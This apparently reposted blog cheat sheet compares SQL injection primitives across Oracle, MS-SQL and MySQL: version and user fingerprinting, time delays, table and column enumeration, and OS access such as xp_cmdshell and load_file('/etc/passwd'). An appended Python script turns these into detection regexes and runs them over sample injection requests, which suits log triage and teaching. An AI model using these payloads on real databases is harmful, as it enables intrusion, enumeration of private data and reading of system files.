| | Oracle | MS-SQL | MySQL |
|---|---|---|---|
| ASCII and substring | `ASCII('A')`; `SUBSTR('ABCDE',2,3)` | `ASCII('A')`; `SUBSTRING('ABCDE',2,3)` | `ASCII('A')`; `SUBSTRING('ABCDE',2,3)` |
| Current database user | `SELECT sys.login_user FROM dual`; `SELECT user FROM dual`; `SYS_CONTEXT('USERENV','SESSION_USER')` | `SELECT suser_sname()` | `SELECT user()` |
| Cause a time delay | `UTL_HTTP.request('http://xx.com')` | `waitfor delay '0:0:10'`; `exec master..xp_cmdshell 'ping localhost'` | `sleep(100)` |
| Database version | `SELECT banner FROM v$version` | `SELECT @@version` | `SELECT @@version` |
| Current database | `SELECT SYS_CONTEXT('USERENV','DB_NAME') FROM dual` | `SELECT db_name()` (server name: `SELECT @@servername`) | `SELECT database()` |
| Current user's privileges | `SELECT privilege FROM session_privs` | `SELECT grantee,table_name,privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES` | `SELECT * FROM information_schema.user_privileges WHERE grantee='[user]'` (here `[user]` is the value returned by `SELECT user()`) |
| All tables and columns | `SELECT table_name\|\|' '\|\|column_name FROM all_tab_columns` | `SELECT table_name+' '+column_name FROM information_schema.columns` | `SELECT CONCAT(table_name,' ',column_name) FROM information_schema.columns` |
| User objects | `SELECT object_name,object_type FROM user_objects` | `SELECT name FROM sysobjects` | `SELECT table_name FROM information_schema.tables` (or `trigger_name FROM information_schema.triggers`, etc.) |
| User tables | `SELECT object_name,object_type FROM user_objects WHERE object_type='TABLE'`; or, for all tables the user can access: `SELECT table_name FROM all_tables` | `SELECT name FROM sysobjects WHERE xtype='U'` | `SELECT table_name FROM information_schema.tables WHERE table_type='BASE TABLE' AND table_schema!='mysql'` |
| Column names of table foo | `SELECT column_name FROM user_tab_columns WHERE table_name='foo'` (if the target data is not owned by the current application user, use `ALL_TAB_COLUMNS` instead) | `SELECT column_name FROM information_schema.columns WHERE table_name='foo'` | `SELECT column_name FROM information_schema.columns WHERE table_name='foo'` |
| Interact with the operating system (simplest method) | See David Litchfield's book *The Oracle Hacker's Handbook* | `exec xp_cmdshell 'dir c:\'` | `select load_file('/etc/passwd')` |
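From the defender's side, the table above doubles as a triage aid: the dialect-specific primitives it lists are exactly what an injection attempt leaves behind in request logs, and which column they fall in tells you which backend the attacker believes is present. The following Python is an added example, not part of the original post: it encodes the table's entries as regular expressions and classifies request strings by the dialect they hint at. The sample request parameters are constructed for the demonstration, not taken from any real log.

```python
import re

# Signatures drawn from the comparison table above, grouped by the dialect
# they belong to. "generic" entries work on more than one DBMS and only
# mark a request as suspicious without pinning down the backend.
SIGNATURES = {
    "oracle": [
        r"\bfrom\s+dual\b", r"\bv\$version\b", r"\bsys_context\s*\(",
        r"\butl_http\.request\b", r"\ball_tab_columns\b", r"\buser_tab_columns\b",
        r"\buser_objects\b", r"\ball_tables\b", r"\bsession_privs\b",
    ],
    "mssql": [
        r"\bwaitfor\s+delay\b", r"\bxp_cmdshell\b", r"\bsuser_sname\s*\(",
        r"\bdb_name\s*\(", r"\bsysobjects\b", r"@@servername\b",
    ],
    "mysql": [
        r"\bsleep\s*\(", r"\bload_file\s*\(", r"\bdatabase\s*\(",
        r"\buser_privileges\b", r"\bconcat\s*\(",
    ],
    "generic": [r"@@version\b", r"\binformation_schema\.", r"\bunion\s+select\b"],
}

COMPILED = {
    dialect: [re.compile(p, re.IGNORECASE) for p in patterns]
    for dialect, patterns in SIGNATURES.items()
}


def classify(request):
    """Return (suspicious, dialect, matched_patterns) for one request string.

    dialect is the DBMS family with the most dialect-specific hits, "unknown"
    when only generic patterns matched, and None when nothing matched.
    """
    hits = {
        dialect: [p.pattern for p in patterns if p.search(request)]
        for dialect, patterns in COMPILED.items()
    }
    matched = [pat for pats in hits.values() for pat in pats]
    if not matched:
        return False, None, []
    specific = {d: h for d, h in hits.items() if d != "generic" and h}
    if not specific:
        return True, "unknown", matched
    # Ties resolve in dict order (oracle, mssql, mysql); adequate for triage.
    best = max(specific, key=lambda d: len(specific[d]))
    return True, best, matched


def scan(lines):
    """Return (line, dialect) for every line that classify() flags."""
    results = []
    for line in lines:
        suspicious, dialect, _ = classify(line)
        if suspicious:
            results.append((line, dialect))
    return results


# Constructed sample request parameters (already URL-decoded), not real log
# data; they mix benign input with payloads built from the table's entries.
SAMPLE_REQUESTS = [
    "id=1",
    "id=1 AND 1=1 waitfor delay '0:0:10'--",
    "id=1 UNION SELECT banner FROM v$version--",
    "id=1 AND sleep(100)--",
    "id=1 UNION SELECT table_name FROM information_schema.tables--",
    "id=1; exec master..xp_cmdshell 'ping localhost'--",
]

if __name__ == "__main__":
    for line, dialect in scan(SAMPLE_REQUESTS):
        print(f"[{dialect}] {line}")
```

The generic bucket is deliberately separate: `@@version` and `information_schema` appear in both the MS-SQL and MySQL columns, so on their own they justify an alert but not a conclusion about the backend. Feed `scan()` the decoded query-string or body parameters from your access or WAF logs; a run of "unknown" hits followed by a dialect-specific one usually marks the point where fingerprinting succeeded.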
This post is from the "saluteiceman" blog; please keep this attribution: http://maxvision.blog.51cto.com/6269192/1695002
SQL syntax
Tags: sql injection